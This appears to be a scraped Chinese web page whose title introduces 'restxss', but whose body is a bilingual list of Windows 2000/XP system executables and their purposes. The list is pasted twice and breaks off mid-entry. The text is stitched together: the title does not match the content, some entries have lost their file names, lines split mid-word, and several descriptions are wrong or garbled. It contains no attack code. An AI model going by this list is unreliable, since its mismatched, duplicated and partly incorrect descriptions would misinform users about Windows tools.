restxss的简单介绍

hacker|
108

文章目录:

dos命令全集从哪能弄到?

accwiz.exe - 辅助工具向导

acsetups.exe - acs setup dcom server executable

actmovie.exe - 直接显示安装工具

append.exe - 允许程序打开制定目录中的数据

arp.exe - 显示和更改计算机的ip与硬件物理地址的对应列表

at.exe - 计划运行任务

atmadm.exe - 调用管理器统计

attrib.exe - 显示和更改文件和文件夹属性

autochk.exe - 检测修复文件系统

autoconv.exe - 在启动过程中自动转化系统

autofmt.exe - 在启动过程中格式化进程

autolfn.exe - 使用长文件名格式

bootok.exe - boot acceptance application for registry

bootvrfy.exe - 通报启动成功

cacls.exe - 显示和编辑acl

calc.exe - 计算器

cdplayer.exe - cd播放器

change.exe - 与终端服务器相关的查询

charmap.exe - 字符映射表

chglogon.exe - 启动或停用会话记录

chgport.exe - 改变端口(终端服务)

chgusr.exe - 改变用户(终端服务)

chkdsk.exe - 磁盘检测程序

chkntfs.exe - 磁盘检测程序

cidaemon.exe - 组成ci文档服务

cipher.exe - 在ntfs上显示或改变加密的文件或目录

cisvc.exe - 索引内容

ckcnv.exe - 变换cookie

cleanmgr.exe - 磁盘清理

cliconfg.exe - sql客户网络工具

clipbrd.exe - 剪贴簿查看器

clipsrv.exe - 运行clipboard服务

clspack.exe - 建立系统文件列表清单

cluster.exe - 显示域的集群

_cmd_.exe - 没什么好说的!

cmdl32.exe - 自动下载连接管理

cmmgr32.exe - 连接管理器

cmmon32.exe - 连接管理器监视

cmstp.exe - 连接管理器配置文件安装程序

comclust.exe - 集群

comp.exe - 比较两个文件和文件集的内容*

compact.exe - 显示或改变ntfs分区上文件的压缩状态

conime.exe - ime控制台

control.exe - 控制面板

convert.exe - 转换文件系统到ntfs

convlog.exe - 转换iis日志文件格式到ncsa格式

cprofile.exe - 转换显示模式

cscript.exe - 较本宿主版本

csrss.exe - 客户服务器runtime进程

csvde.exe - 日至格式转换程序

dbgtrace.exe - 和terminal server相关

dcomcnfg.exe - dcom配置属性

dcphelp.exe - ?

dcpromo.exe - ad安装向导

ddeshare.exe - dde共享

ddmprxy.exe -

debug.exe - 就是debug啦!

dfrgfat.exe - fat分区磁盘碎片整理程序

dfrgntfs.exe - ntfs分区磁盘碎片整理程序

dfs_cmd_.exe - 配置一个dfs树

dfsinit.exe - 分布式文件系统初始化

dfssvc.exe - 分布式文件系统服务器

diantz.exe - 制作cab文件

diskperf.exe - 磁盘性能计数器

dllhost.exe - 所有com+应用软件的主进程

dllhst3g.exe -

dmadmin.exe - 磁盘管理服务

dmremote.exe - 磁盘管理服务的一部分

dns.exe - dns applications dns

doskey.exe - 命令行创建宏

dosx.exe - dos扩展

dplaysvr.exe - 直接运行帮助

drwatson.exe - 华生医生错误检测

drwtsn32.exe - 华生医生显示和配置管理

dtcsetup.exe - installs mdtc

dvdplay.exe - dvd播放

dxdiag.exe - direct-x诊断工具

edlin.exe - 命令行的文本编辑器

esentutl.exe - ms数据库工具

eudcedit.exe - type造字程序

eventvwr.exe - 事件查看器

evnt_cmd_.exe - event to trap translator; configuration tool

evntwin.exe - event to trap translator setup

exe2bin.exe - 转换exe文件到二进制

expand.exe - 解压缩

extrac32.exe - 解cab工具

fastopen.exe - 快速访问在内存中的硬盘文件

faxcover.exe - 传真封面编辑

faxqueue.exe - 显示传真队列

faxsend.exe - 发送传真向导

faxsvc.exe - 启动传真服务

fc.exe - 比较两个文件的不同

find.exe - 查找文件中的文本行

findstr.exe - 查找文件中的行

finger.exe - 一个用户并显示出统计结果

fixmapi.exe - 修复mapi文件

flattemp.exe - 允许或者禁用临时文件目录

fontview.exe - 显示字体文件中的字体

forcedos.exe - forces a file to start in dos mode. 强制文件在dos模式下运行

freecell.exe - popular windows game 空当接龙

 - file transfer protocol used to transfer files over a network conne

ction 就是ftp了

gdi.exe - graphic device interface 图形界面驱动

grovel.exe -

grpconv.exe - program manager group convertor 转换程序管理员组

help.exe - displays help for windows 2000 commands 显示帮助

hostname.exe - display hostname for machine. 显示机器的hostname

ie4uinit.exe - ie5 user install tool ie5用户安装工具

ieshwiz.exe - customize folder wizard 自定义文件夹向导

iexpress.exe - create and setup packages for install 穿件安装包

iisreset.exe - restart iis admin service 重启iis服务

internat.exe - keyboard language indicator applet 键盘语言指示器

ipconfig.exe - windows 2000 ip configuration. 察看ip配置

ipsecmon.exe - ip security monitor ip安全监视器

ipxroute.exe - ipx routing and source routing control program ipx路由和源路由控制程序

ir - setup ftp for wireless communication 无线连接

ismserv.exe - intersite messaging service 安装或者删除service control manager中的服务

jdbgmgr.exe - microsoft debugger for java 4 java4的调试器

jetconv.exe - convert a jet engine database 转换jet engine数据库

jetpack.exe - compact jet database. 压缩jet数据库

jview.exe - command-line loader for java java的命令行装载者

krnl386.exe - core component for windows 2000 2000的核心组件

label.exe - change label for drives 改变驱动器的卷标

lcwiz.exe - license compliance wizard for local or remote systems. 许可证符合向导

ldifde.exe - ldif cmd line manager ldif目录交换命令行管理

licmgr.exe - terminal server license manager 终端服务许可协议管理

lights.exe - display connection status lights 显示连接状况

llsmgr.exe - windows 2000 license manager 2000许可协议管理

llssrv.exe - start the license server 启动许可协议服务器

lnkstub.exe -

locator.exe - rpc locator 远程定位

lodctr.exe - load perfmon counters 调用性能计数

logoff.exe - log current user off. 注销用户

lpq.exe - displays status of a remote lpd queue 显示远端的lpd打印队列的状态,显示被送到基于unix的服务器的打印任务

lpr.exe - send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。

lsass.exe - lsa executable and server dll 运行lsa和server的dll

lserver.exe - specifies the new dns domain for the default server 指定默认se

rver新的dns域

os2.exe - an os/2 warp server (os2 /o) os/2

os2srv.exe - an os/2 warp server os/2

os2ss.exe - an os/2 warp server os/2

osk.exe - on screen keyboard 屏幕键盘

packager.exe - windows 2000 packager manager 对象包装程序

pathping.exe - combination of ping and tracert 包含ping和tracert的程序

pax.exe - is a posix program and path names used as arguments must be specified in posix format. use "文件://c/users/default" instead of "c:\users\default." 

启动便携式存档互换 (pax) 实用程序

pentnt.exe - used to check the pentium for the floating point division error

. 检查pentium的浮点错误

perfmon.exe - starts windows performance monitor 性能监视器

ping.exe - packet internet groper 验证与远程计算机的连接

posix.exe - used for backward compatibility with unix 用于兼容unix

print.exe - cmd line used to print files 打印文本文件或显示打印队列的内容。

progman.exe - program manager 程序管理器

proquota.exe - profile quota program

psxss.exe - posix subsystem application posix子系统应用程序

qappsrv.exe - displays the available application terminal servers on the net

work

在网络上显示终端服务器可用的程序

qprocess.exe - display information about processes local or remote 在本地或远程显示进程的信息(需终端服务)

query.exe - query termserver user process and sessions 查询进程和对话

quser.exe - display information about a user logged on 显示用户登陆的信息(需终端服务)

qwinsta.exe - display information about terminal sessions. 显示终端服务的信息

rasadmin.exe - start the remote access admin service 启动远程访问服务

rasautou.exe - creates a ras connection 建立一个ras连接

rasdial.exe - dial a connection 拨号连接

ras.exe - starts a ras connection 运行ras连接

rcp.exe - copies a file from and to a rcp service. 在 windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe - rdpclip allows you to copy and paste files between a terminal 

session and client console session. 再终端和本地复制和粘贴文件

recover.exe - recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。

redir.exe - starts the redirector service 运行重定向服务

regedt32.exe - 32-bit register service 32位注册服务

regini.exe - modify registry permissions from within a script 用脚本修改注册许可

register.exe - register a program so it can have special execution character

istics. 注册包含特殊运行字符的程序

regsvc.exe -

regsvr32.exe - registers and unregisters dlls. as to how and where it regi

sters them i dont know. 注册和反注册dll

regtrace.exe - options to tune debug options for applications failing to dum

p trace statements trace 设置

regwiz.exe - registration wizard 注册向导

remrras.exe -

replace.exe - replace files 用源目录中的同名文件替换目标目录中的文件。

reset.exe - reset an active section 重置活动部分

rexec.exe - runs commands on remote hosts running the rexec service. 在运行 rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。

risetup.exe - starts the remote installation service wizard. 运行远程安装向导服务

route.exe - display or edit the current routing tables. 控制网络路由表

routemon.exe - no longer supported 不再支持了!

router.exe - router software that runs either on a dedicated dos or on an os

/2 system. route软件在 dos或者是os/2系统

rsh.exe - runs commands on remote hosts running the rsh service 在运行 rsh 服务的远程计算机上运行命令

rsm.exe - mounts and configures remote system media 配置远程系统媒体

rsnotify.exe - remote storage notification recall 远程存储通知回显

rsvp.exe - resource reservation protocol 源预约协议

runas.exe - run a program as another user 允许用户用其他权限运行指定的工具和程序

rundll32.exe - launches a 32-bit dll program 启动32位dll程序

runonce.exe - causes a program to run during startup 运行程序再开始菜单中

rwinsta.exe - reset the session subsystem hardware and software to known ini

tial values 重置会话子系统硬件和软件到最初的值

savedump.exe - does not write to e:\winnt\user.dmp 不写入user.dmp中

scardsvr.exe - smart card resource management server 子能卡资源管理服务器

schupgr.exe - it will read the schema update files (.ldf files) and upgrade 

the schema. (part of adsi) 读取计划更新文件和更新计划

secedit.exe - starts security editor help 自动安全性配置管理

services.exe - controls all the services 控制所有服务

sethc.exe - set high contrast - changes colours and display mode logoff to s

et it back to normal 设置高对比

setreg.exe - shows the software publishing state key values 显示软件发布的国家语言

setup.exe - gui box prompts you to goto control panel to configure system co

mponents 安装程序(转到控制面板)

setver.exe - set version for files 设置 ms-dos 子系统向程序报告的 ms-dos 版本号

sfc.exe - system file checker test and check system files for integrity 系统

文件检查

sfmprint.exe - print services for macintosh 打印macintosh服务

sfmpsexe.exe -

sfmsvc.exe -

shadow.exe - monitor another terminal services session. 监控另外一台中端服务器会话

share.exe - windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与 ms-dos 文件兼容

shmgrate.exe -

shrpubw.exe - create and share folders 建立和共享文件夹

sigverif.exe - file signature verification 文件签名验证

skeys.exe - serial keys utility 序列号制作工具

smlogsvc.exe - performance logs and alerts 性能日志和警报

smss.exe -

sndrec32.exe - starts the windows sound recorder 录音机

sndvol32.exe - display the current volume information 显示声音控制信息

snmp.exe - simple network management protocol used for network mangement 简单网络管理协议

snmptrap.exe - utility used with snmp snmp工具

sol.exe - windows solitaire game 纸牌

sort.exe - compares files and folders 读取输入、排序数据并将结果写到屏幕、文件和其他设备上

SPOOLSV.EXE - Part of the spooler service for printing 打印池服务的一部分

sprestrt.exe -

srvmgr.exe - Starts the Windows Server Manager 服务器管理器

stimon.exe - WDM StillImage- - Monitor

stisvc.exe - WDM StillImage- - Service

subst.exe - Associates a path with a drive letter 将路径与驱动器盘符关联

svchost.exe - Svchost.exe is a generic host process name for services that a

re run from dynamic-link libraries (DLLs). DLL得主进程

syncapp.exe - Creates Windows Briefcase. 创建Windows文件包

sysedit.exe - Opens Editor for 4 system files 系统配置编辑器

syskey.exe - Encrypt and secure system database NT账号数据库按群工具

sysocmgr.exe - Windows 2000 Setup 2000安装程序

systray.exe - Starts the systray in the lower right corner. 在低权限运行syst

ray

macfile.exe - Used for managing MACFILES 管理MACFILES

magnify.exe - Used to magnify the current screen 放大镜

makecab.exe - MS Cabinet Maker 制作CAB文件

mdm.exe - Machine Debug Manager 机器调试管理

mem.exe - Display current Memory stats 显示内存状态

migpwd.exe - Migrate passwords. 迁移密码

mmc.exe - Microsoft Management Console 控制台

mnmsrvc.exe - Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享

mobsync.exe - Manage Synchronization. 同步目录管理器

mountvol.exe - Creates, deletes, or lists a volume mount point. 创建、删除或列出卷的装入点。

mplay32.exe - MS Media Player 媒体播放器

mpnotify.exe - Multiple Provider Notification application 多提供者通知应用程序

mq1sync.exe -

mqbkup.exe - MS Message Queue Backup and Restore Utility 信息队列备份和恢复工具

mqexchng.exe - MSMQ Exchange Connector Setup 信息队列交换连接设置

mqmig.exe - MSMQ Migration Utility 信息队列迁移工具

mqsvc.exe - ?

mrinfo.exe - Multicast routing using SNMP 使用SNMP多点传送路由

mscdexnt.exe - Installs MSCD (MS CD Extensions) 安装MSCD

msdtc.exe - Dynamic Transaction Controller Console 动态事务处理控制台

msg.exe - Send a message to a user local or remote. 发送消息到本地或远程客户

mshta.exe - HTML Application HOST HTML应用程序主机

msiexec.exe - Starts Windows Installer Program 开始Windows安装程序

mspaint.exe - Microsoft Paint 画板

msswchx.exe -

mstask.exe - Task Schedule Program 任务计划表程序

mstinit.exe - Task scheduler setup 任务计划表安装

narrator.exe - Program will allow you to have a narrator for reading. Micros

oft讲述人

nbtstat.exe - Displays protocol stats and current TCP/IP connections using N

BT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。

nddeapir.exe - NDDE API Server side NDDE API服务器端

net.exe - Net Utility 详细用法看/?

net1.exe - Net Utility updated version from MS Net的升级版

netdde.exe - Network DDE will install itself into the background 安装自己到后台

netsh.exe - Creates a shell for network information 用于配置和监控 Windows 2000 命令行脚本接口。

netstat.exe - Displays current connections. 显示协议统计和当前的 TCP/IP 网络连接。

nlsfunc.exe - Loads country-specific information 加载特定国家(地区)的信息。Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容。

notepad.exe - Opens Windows 2000 Notepad 记事本

nslookup.exe - Displays information for DNS 该诊断工具显示来自域名系统 (DNS)名称服务器的信息。

ntbackup.exe - Opens the NT Backup Utility 备份和故障修复工具

ntbooks.exe - Starts Windows Help Utility 帮助

ntdsutil.exe - Performs DB maintenance of the ADSI 完成ADSI的DB的维护

ntfrs.exe - NT File Replication Service NT文件复制服务

ntfrsupg.exe -

ntkrnlpa.exe - Kernel patch 核心补丁

ntoskrnl.exe - Core NT Kernel KT的核心

ntsd.exe -

ntvdm.exe - Simulates a 16-bit Windows environment 模拟16位Windows环境

nw16.exe - Netware Redirector NetWare转向器

nwscript.exe - runs netware scripts 运行Netware脚本

odbcad32.exe - ODBC 32-bit Administrator 32位ODBC管理

odbcconf.exe - Configure ODBC drivers and data sources from command line 命令行配置ODBC驱动和数据源

taskman.exe - Task Manager 任务管理器

taskmgr.exe - Starts the Windows 2000 Task Manager 任务管理器

tcmsetup.exe - telephony client wizard 电话服务客户安装

tcpsvcs.exe - TCP Services TCP服务

.exe - Telnet Utility used to connect to Telnet Server

termsrv.exe - Terminal Server 终端服务

t - Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行

TFTP 服务的远程计算机传输文件

tftpd.exe - Trivial FTP Daemon

themes.exe - Change Windows Themes 桌面主题

tlntadmn.exe - Telnet Server Administrator Telnet服务管理

tlntsess.exe - Display the current Telnet Sessions 显示目前的Telnet会话

tlntsvr.exe - Start the Telnet Server 开始Telnet服务

tracert.exe - Trace a route to display paths 该诊断实用程序将包含不同生存时间(TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由

tsadmin.exe - Terminal Server Administrator 终端服务管理器

tscon.exe - Attaches a user session to a terminal session. 粘贴用户会话到终端对话

tsdiscon.exe - Disconnect a user from a terminal session 断开终端服务的用户

tskill.exe - Kill a Terminal server process 杀掉终端服务

tsprof.exe - Used with Terminal Server to query results. 用终端服务得出查询结果

tsshutdn.exe - Shutdown the system 关闭系统

unlodctr.exe - Part of performance monitoring 性能监视器的一部分

upg351db.exe - Upgrade a jet database 升级Jet数据库

ups.exe - UPS service UPS服务

user.exe - Core Windows Service Windows核心服务

userinit.exe - Part of the winlogon process Winlogon进程的一部分

usrmgr.exe - Start the windows user manager for domains 域用户管理器

utilman.exe - This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那台机器

verifier.exe - Driver Verifier Manager Driver Verifier Manager

vwipxspx.exe - Loads IPX/SPX VDM 调用IPX/SPX VDM

w32tm.exe - Windows Time Server 时间服务器

wextract.exe - Used to extract windows files 解压缩Windows文件

winchat.exe - Opens Windows Chat 打开Windows聊天

winhlp32.exe - Starts the Windows Help System 运行帮助系统

winlogon.exe - Used as part of the logon process. Logon进程的一部分

winmine.exe - windows Game 挖地雷

winmsd.exe - Windows Diagnostic utility 系统信息

wins.exe - Wins Service Wins服务

winspool.exe - Print Routing 打印路由

winver.exe - Displays the current version of Windows 显示Windows版本

wizmgr.exe - Starts Windows Administration Wizards Windows管理向导

wjview.exe - Command line loader for Java 命令行调用Java

wowdeb.exe - . For starters, the 32-bit APIs require that the WOWDEB.EXE tas

k runs in the target debugees VM 启动时,32位API需要

wowexec.exe - For running Windows over Windows Applications 在Windows应用程序上运行Windows

wpnpinst.exe - ?

write.exe - Starts MS Write Program 写字板

wscript.exe - Windows Scripting Utility 脚本工具

wupdmgr.exe - Starts the Windows update Wizard (Internet) 运行Windows升级向导

xcopy.exe - 复制文件和目录,包括子目录

ntoskrnl文件丢失怎么办!!!

题 Windows 2000/XP的CMD命令教程(命令篇)

accwiz.exe - 辅助工具向导

acsetups.exe - acs setup dcom server executable

actmovie.exe - 直接显示安装工具

append.exe - 允许程序打开制定目录中的数据

arp.exe - 显示和更改计算机的ip与硬件物理地址的对应列表

at.exe - 计划运行任务

atmadm.exe - 调用管理器统计

attrib.exe - 显示和更改文件和文件夹属性

autochk.exe - 检测修复文件系统

autoconv.exe - 在启动过程中自动转化系统

autofmt.exe - 在启动过程中格式化进程

autolfn.exe - 使用长文件名格式

bootok.exe - boot acceptance application for registry

bootvrfy.exe - 通报启动成功

cacls.exe - 显示和编辑acl

calc.exe - 计算器

cdplayer.exe - cd播放器

change.exe - 与终端服务器相关的查询

charmap.exe - 字符映射表

chglogon.exe - 启动或停用会话记录

chgport.exe - 改变端口(终端服务)

chgusr.exe - 改变用户(终端服务)

chkdsk.exe - 磁盘检测程序

chkntfs.exe - 磁盘检测程序

cidaemon.exe - 组成ci文档服务

cipher.exe - 在ntfs上显示或改变加密的文件或目录

cisvc.exe - 索引内容

ckcnv.exe - 变换cookie

cleanmgr.exe - 磁盘清理

cliconfg.exe - sql客户网络工具

clipbrd.exe - 剪贴簿查看器

clipsrv.exe - 运行clipboard服务

clspack.exe - 建立系统文件列表清单

cluster.exe - 显示域的集群

_cmd_.exe - 没什么好说的!

cmdl32.exe - 自动下载连接管理

cmmgr32.exe - 连接管理器

cmmon32.exe - 连接管理器监视

cmstp.exe - 连接管理器配置文件安装程序

comclust.exe - 集群

comp.exe - 比较两个文件和文件集的内容*

compact.exe - 显示或改变ntfs分区上文件的压缩状态

conime.exe - ime控制台

control.exe - 控制面板

convert.exe - 转换文件系统到ntfs

convlog.exe - 转换iis日志文件格式到ncsa格式

cprofile.exe - 转换显示模式

cscript.exe - 较本宿主版本

csrss.exe - 客户服务器runtime进程

csvde.exe - 日至格式转换程序

dbgtrace.exe - 和terminal server相关

dcomcnfg.exe - dcom配置属性

dcphelp.exe - ?

dcpromo.exe - ad安装向导

ddeshare.exe - dde共享

ddmprxy.exe -

debug.exe - 就是debug啦!

dfrgfat.exe - fat分区磁盘碎片整理程序

dfrgntfs.exe - ntfs分区磁盘碎片整理程序

dfs_cmd_.exe - 配置一个dfs树

dfsinit.exe - 分布式文件系统初始化

dfssvc.exe - 分布式文件系统服务器

diantz.exe - 制作cab文件

diskperf.exe - 磁盘性能计数器

dllhost.exe - 所有com+应用软件的主进程

dllhst3g.exe -

dmadmin.exe - 磁盘管理服务

dmremote.exe - 磁盘管理服务的一部分

dns.exe - dns applications dns

doskey.exe - 命令行创建宏

dosx.exe - dos扩展

dplaysvr.exe - 直接运行帮助

drwatson.exe - 华生医生错误检测

drwtsn32.exe - 华生医生显示和配置管理

dtcsetup.exe - installs mdtc

dvdplay.exe - dvd播放

dxdiag.exe - direct-x诊断工具

edlin.exe - 命令行的文本编辑器(历史悠久啊!)

edlin.exe - 命令行的文本编辑器(历史悠久啊!)

esentutl.exe - ms数据库工具

eudcedit.exe - type造字程序

eventvwr.exe - 事件查看器

evnt_cmd_.exe - event to trap translator; configuration tool

evntwin.exe - event to trap translator setup

exe2bin.exe - 转换exe文件到二进制

expand.exe - 解压缩

extrac32.exe - 解cab工具

fastopen.exe - 快速访问在内存中的硬盘文件

faxcover.exe - 传真封面编辑

faxqueue.exe - 显示传真队列

faxsend.exe - 发送传真向导

faxsvc.exe - 启动传真服务

fc.exe - 比较两个文件的不同

find.exe - 查找文件中的文本行

findstr.exe - 查找文件中的行

finger.exe - 一个用户并显示出统计结果

fixmapi.exe - 修复mapi文件

flattemp.exe - 允许或者禁用临时文件目录

fontview.exe - 显示字体文件中的字体

forcedos.exe - forces a file to start in dos mode. 强制文件在dos模式下运行

freecell.exe - popular windows game 空当接龙

- file transfer protocol used to transfer files over a network conne

ction 就是ftp了

gdi.exe - graphic device interface 图形界面驱动

grovel.exe -

grpconv.exe - program manager group convertor 转换程序管理员组

help.exe - displays help for windows 2000 commands 显示帮助

hostname.exe - display hostname for machine. 显示机器的hostname

ie4uinit.exe - ie5 user install tool ie5用户安装工具

ieshwiz.exe - customize folder wizard 自定义文件夹向导

iexpress.exe - create and setup packages for install 穿件安装包

iisreset.exe - restart iis admin service 重启iis服务

internat.exe - keyboard language indicator applet 键盘语言指示器

ipconfig.exe - windows 2000 ip configuration. 察看ip配置

ipsecmon.exe - ip security monitor ip安全监视器

ipxroute.exe - ipx routing and source routing control program ipx路由和源路由

控制程序

ir - setup ftp for wireless communication 无线连接

ismserv.exe - intersite messaging service 安装或者删除service control manage

r中的服务

jdbgmgr.exe - microsoft debugger for java 4 java4的调试器

jetconv.exe - convert a jet engine database 转换jet engine数据库

jetpack.exe - compact jet database. 压缩jet数据库

jview.exe - command-line loader for java java的命令行装载者

krnl386.exe - core component for windows 2000 2000的核心组件

label.exe - change label for drives 改变驱动器的卷标

lcwiz.exe - license compliance wizard for local or remote systems. 许可证符合

向导

ldifde.exe - ldif cmd line manager ldif目录交换命令行管理

licmgr.exe - terminal server license manager 终端服务许可协议管理

lights.exe - display connection status lights 显示连接状况

llsmgr.exe - windows 2000 license manager 2000许可协议管理

llssrv.exe - start the license server 启动许可协议服务器

lnkstub.exe -

locator.exe - rpc locator 远程定位

lodctr.exe - load perfmon counters 调用性能计数

logoff.exe - log current user off. 注销用户

lpq.exe - displays status of a remote lpd queue 显示远端的lpd打印队列的状态,

显示被送到基于unix的服务器的打印任务

lpr.exe - send a print job to a network printer. 重定向打印任务到网络中的打印

机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。

lsass.exe - lsa executable and server dll 运行lsa和server的dll

lserver.exe - specifies the new dns domain for the default server 指定默认se

rver新的dns域

os2.exe - an os/2 warp server (os2 /o) os/2

os2srv.exe - an os/2 warp server os/2

os2ss.exe - an os/2 warp server os/2

osk.exe - on screen keyboard 屏幕键盘

packager.exe - windows 2000 packager manager 对象包装程序

pathping.exe - combination of ping and tracert 包含ping和tracert的程序

pax.exe - is a posix program and path names used as arguments must be specif

ied in posix format. use "" instead of "c:\users\default."

启动便携式存档互换 (pax) 实用程序

pentnt.exe - used to check the pentium for the floating point division error

. 检查pentium的浮点错误

perfmon.exe - starts windows performance monitor 性能监视器

ping.exe - packet internet groper 验证与远程计算机的连接

posix.exe - used for backward compatibility with unix 用于兼容unix

print.exe - cmd line used to print files 打印文本文件或显示打印队列的内容。

progman.exe - program manager 程序管理器

proquota.exe - profile quota program

psxss.exe - posix subsystem application posix子系统应用程序

qappsrv.exe - displays the available application terminal servers on the net

work

在网络上显示终端服务器可用的程序

qprocess.exe - display information about processes local or remote 在本地或远

程显示进程的信息(需终端服务)

query.exe - query termserver user process and sessions 查询进程和对话

quser.exe - display information about a user logged on 显示用户登陆的信息(需

终端服务)

qwinsta.exe - display information about terminal sessions. 显示终端服务的信息

rasadmin.exe - start the remote access admin service 启动远程访问服务

rasautou.exe - creates a ras connection 建立一个ras连接

rasdial.exe - dial a connection 拨号连接

ras.exe - starts a ras connection 运行ras连接

rcp.exe - copies a file from and to a rcp service. 在 windows 2000 计算机和运

行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe - rdpclip allows you to copy and paste files between a terminal

session and client console session. 再终端和本地复制和粘贴文件

recover.exe - recovers readable information from a bad or defective disk 从坏

的或有缺陷的磁盘中恢复可读取的信息。

redir.exe - starts the redirector service 运行重定向服务

regedt32.exe - 32-bit register service 32位注册服务

regini.exe - modify registry permissions from within a script 用脚本修改注册

许可

register.exe - register a program so it can have special execution character

istics. 注册包含特殊运行字符的程序

regsvc.exe -

regsvr32.exe - registers and unregisters dlls. as to how and where it regi

sters them i dont know. 注册和反注册dll

regtrace.exe - options to tune debug options for applications failing to dum

p trace statements

trace 设置

regwiz.exe - registration wizard 注册向导

remrras.exe -

replace.exe - replace files 用源目录中的同名文件替换目标目录中的文件。

reset.exe - reset an active section 重置活动部分

rexec.exe - runs commands on remote hosts running the rexec service. 在运行

rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机

上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。

risetup.exe - starts the remote installation service wizard. 运行远程安装向导

服务

route.exe - display or edit the current routing tables. 控制网络路由表

routemon.exe - no longer supported 不再支持了!

router.exe - router software that runs either on a dedicated dos or on an os

/2 system. route软件在 dos或者是os/2系统

rsh.exe - runs commands on remote hosts running the rsh service 在运行 rsh 服

务的远程计算机上运行命令

rsm.exe - mounts and configures remote system media 配置远程系统媒体

rsnotify.exe - remote storage notification recall 远程存储通知回显

rsvp.exe - resource reservation protocol 源预约协议

runas.exe - run a program as another user 允许用户用其他权限运行指定的工具和

程序

rundll32.exe - launches a 32-bit dll program 启动32位dll程序

runonce.exe - causes a program to run during startup 运行程序再开始菜单中

rwinsta.exe - reset the session subsystem hardware and software to known ini

tial values 重置会话子系统硬件和软件到最初的值

savedump.exe - does not write to e:\winnt\user.dmp 不写入user.dmp中

scardsvr.exe - smart card resource management server 子能卡资源管理服务器

schupgr.exe - it will read the schema update files (.ldf files) and upgrade

the schema. (part of adsi) 读取计划更新文件和更新计划

secedit.exe - starts security editor help 自动安全性配置管理

services.exe - controls all the services 控制所有服务

sethc.exe - set high contrast - changes colours and display mode logoff to s

et it back to normal 设置高对比

setreg.exe - shows the software publishing state key values 显示软件发布的国

家语言

setup.exe - gui box prompts you to goto control panel to configure system co

mponents 安装程序(转到控制面板)

setver.exe - set version for files 设置 ms-dos 子系统向程序报告的 ms-dos 版本

sfc.exe - system file checker test and check system files for integrity 系统

文件检查

sfmprint.exe - print services for macintosh 打印macintosh服务

sfmpsexe.exe -

sfmsvc.exe -

shadow.exe - monitor another terminal services session. 监控另外一台中端服务

器会话

share.exe - windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与

ms-dos 文件兼容

shmgrate.exe -

shrpubw.exe - create and share folders 建立和共享文件夹

sigverif.exe - file signature verification 文件签名验证

skeys.exe - serial keys utility 序列号制作工具

smlogsvc.exe - performance logs and alerts 性能日志和警报

smss.exe -

sndrec32.exe - starts the windows sound recorder 录音机

sndvol32.exe - display the current volume information 显示声音控制信息

snmp.exe - simple network management protocol used for network mangement 简单

网络管理协议

snmptrap.exe - utility used with snmp snmp工具

sol.exe - windows solitaire game 纸牌

sort.exe - compares files and folders 读取输入、排序数据并将结果写到屏幕、文

件和其他设备上

SPOOLSV.EXE - Part of the spooler service for printing 打印池服务的一部分

sprestrt.exe -

srvmgr.exe - Starts the Windows Server Manager 服务器管理器

stimon.exe - WDM StillImage- - Monitor

stisvc.exe - WDM StillImage- - Service

subst.exe - Associates a path with a drive letter 将路径与驱动器盘符关联

svchost.exe - Svchost.exe is a generic host process name for services that a

re run from dynamic-link libraries (DLLs). DLL得主进程

syncapp.exe - Creates Windows Briefcase. 创建Windows文件包

sysedit.exe - Opens Editor for 4 system files 系统配置编辑器

syskey.exe - Encrypt and secure system database NT账号数据库按群工具

sysocmgr.exe - Windows 2000 Setup 2000安装程序

systray.exe - Starts the systray in the lower right corner. 在低权限运行syst

ray

macfile.exe - Used for managing MACFILES 管理MACFILES

magnify.exe - Used to magnify the current screen 放大镜

makecab.exe - MS Cabinet Maker 制作CAB文件

mdm.exe - Machine Debug Manager 机器调试管理

mem.exe - Display current Memory stats 显示内存状态

migpwd.exe - Migrate passwords. 迁移密码

mmc.exe - Microsoft Management Console 控制台

mnmsrvc.exe - Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享

mobsync.exe - Manage Synchronization. 同步目录管理器

mountvol.exe - Creates, deletes, or lists a volume mount point. 创建、删除或

列出卷的装入点。

mplay32.exe - MS Media Player 媒体播放器

mpnotify.exe - Multiple Provider Notification application 多提供者通知应用程

mq1sync.exe -

mqbkup.exe - MS Message Queue Backup and Restore Utility 信息队列备份和恢复工

mqexchng.exe - MSMQ Exchange Connector Setup 信息队列交换连接设置

mqmig.exe - MSMQ Migration Utility 信息队列迁移工具

mqsvc.exe - ?

mrinfo.exe - Multicast routing using SNMP 使用SNMP多点传送路由

mscdexnt.exe - Installs MSCD (MS CD Extensions) 安装MSCD

msdtc.exe - Dynamic Transaction Controller Console 动态事务处理控制台

msg.exe - Send a message to a user local or remote. 发送消息到本地或远程客户

mshta.exe - HTML Application HOST HTML应用程序主机

msiexec.exe - Starts Windows Installer Program 开始Windows安装程序

mspaint.exe - Microsoft Paint 画板

msswchx.exe -

mstask.exe - Task Schedule Program 任务计划表程序

mstinit.exe - Task scheduler setup 任务计划表安装

narrator.exe - Program will allow you to have a narrator for reading. Micros

oft讲述人

nbtstat.exe - Displays protocol stats and current TCP/IP connections using N

BT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。

nddeapir.exe - NDDE API Server side NDDE API服务器端

net.exe - Net Utility 详细用法看/?

net1.exe - Net Utility updated version from MS Net的升级版

netdde.exe - Network DDE will install itself into the background 安装自己到后

